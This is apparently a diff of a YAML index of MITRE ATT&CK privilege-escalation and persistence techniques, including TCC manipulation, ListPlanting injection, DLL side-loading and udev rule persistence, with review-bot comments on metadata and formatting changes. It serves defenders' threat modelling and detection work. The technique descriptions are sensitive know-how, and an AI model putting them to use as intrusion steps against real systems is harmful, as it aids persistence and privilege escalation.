Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -23245,12 +23528,11 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -23300,12 +23582,11 @@ privilege-escalation:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -23338,9 +23619,10 @@ privilege-escalation:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
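Review bot: splitting `- Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` into two contributors drops the affiliation from `- Naveen Vijayaraghavan`; only Nilesh Dherange keeps `(Gurucul)`. Confirm that matches the upstream `x_mitre_contributors` list for T1098.002 before merging rather than being a side effect of the regeneration.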
@@ -23357,9 +23639,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
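Review bot: replacing `- Office 365` and `- Google Workspace` with `- Office Suite` (and `x_mitre_version` 2.1 to 2.2) follows the upstream platform consolidation, but anything in this repo that filters or builds per-platform indexes by matching the literal strings `Office 365` or `Google Workspace` will silently stop selecting T1098.002. Those filters need an old-to-new platform mapping in the same change.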
@@ -23405,38 +23686,19 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests: []
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
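Review bot: `description: |+` keeps the trailing blank line, so this string now ends in two newlines, while sibling entries (T1574.002, T1546.017) use `|-`. Stripping trailing whitespace in the generator would make all descriptions emit as `|-` and avoid chomping-indicator churn in future diffs. Separately, `an overwrites file (if connected to an MDM)` reads like a typo for "overrides" in the upstream ATT&CK text; it belongs in an upstream fix, not a local patch to the index.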
@@ -23444,6 +23706,8 @@ privilege-escalation:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -23451,7 +23715,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -23481,7 +23745,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
@@ -23527,7 +23790,7 @@ privilege-escalation:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
@@ -23572,8 +23835,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1037.001:
technique:
@@ -23599,7 +23860,7 @@ privilege-escalation:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -23625,59 +23886,28 @@ privilege-escalation:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests: []
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
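Review bot: several lines in this hunk have no `+`, `-` or space prefix (`control.\n\nListPlanting (a`, `child of`, `and/or EnumWindows`, `) or other [Process Injection]...`), each sitting where inline markup around `SysListView32`, `FindWindow` and `EnumWindows` would be in the description. Either the patch text was mangled when pasted or the generated YAML really has these breaks; check that the applied file parses and that the description remains one string on one logical line before merging.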
@@ -23694,6 +23924,9 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -23708,21 +23941,52 @@ privilege-escalation:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests: []
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
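Review bot: this hunk adds `revoked: false` and re-emits `external_references` in a different order (Hexacorn now second, Microsoft fourth) while the only content change to T1055.015 is the new `Hexacorn Listplanting` reference and the 1.0 to 1.1 version bump; most of the lines here and in the preceding hunk are key reordering. If the generator emitted keys in a fixed sorted order the real change would be a handful of lines.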
@@ -23767,9 +24031,8 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
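Review bot: for T1484 `- SaaS` is removed outright, not renamed, and only `- Identity Provider` replaces `- Azure AD` and `- SaaS` together. Any SaaS-platform index built from `x_mitre_platforms` will lose T1484 after this change; confirm that is the upstream intent (version 3.0 to 3.1) and not a mapping mistake.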
@@ -23826,8 +24089,8 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -23836,7 +24099,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.008:
technique:
@@ -23878,7 +24140,7 @@ privilege-escalation:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -23903,12 +24165,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -23948,8 +24209,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
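Review bot: `x_mitre_attack_spec_version: 3.2.0` is added here for T1078.004 and the same key is deleted further down in the hunk at `@@ -23994,17 +24257,14 @@`, so one relocation is spread across three hunks and reads as a change. Stable key ordering in the generator (for example emitting the `x_mitre_*` fields in a fixed position) would keep such moves out of future diffs; the substantive addition here is just `- Arun Seelagan, CISA`.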
@@ -23957,13 +24220,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -23994,17 +24257,14 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
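Review bot: the whole description line is replaced, but the only change is the appended sentence `In addition to explicitly running the at command, adversaries may also schedule a task with at by directly leveraging the Windows Management Instrumentation Win32_ScheduledJob WMI class.(Citation: Malicious Life by Cybereason)`; the commit message should say so, since the diff does not show it. The mapping is accurate (`Win32_ScheduledJob` represents AT-style jobs, not tasks created with `schtasks`), and the existing note that at requires the Task Scheduler service and local Administrators membership applies to that path as well.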
@@ -24067,7 +24327,7 @@ privilege-escalation:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -24101,8 +24361,8 @@ privilege-escalation:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -24111,6 +24371,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
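Review bot: the new reference `Malicious Life by Cybereason` has `(n.d.)` for the date and a URL ending in `#blog-subscribe`, which is a subscription-widget anchor rather than part of the article address. Harmless for the index, but verify that the fragment is what upstream stores and not something the generator appended, so the next regeneration does not flip it again.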
@@ -24123,7 +24387,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
T1055.001:
@@ -24226,9 +24489,67 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests: []
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1546.007:
technique:
x_mitre_platforms:
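Review bot: the new T1546.017 block has no `identifier:` key between `x_mitre_modified_by_ref` and `atomic_tests: []`, whereas siblings such as T1547.007 and T1098.002 carry `identifier: T1547.007` / `identifier: T1098.002` (T1548.006 and T1484 also lack it, so the inconsistency predates this PR). If anything consumes `identifier`, add `identifier: T1546.017` here; `atomic_tests: []` is expected for a freshly added Linux-only technique, but the Linux index should be checked to confirm it picks the technique up as well.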
@@ -24264,7 +24585,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -24288,12 +24609,11 @@ privilege-escalation:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
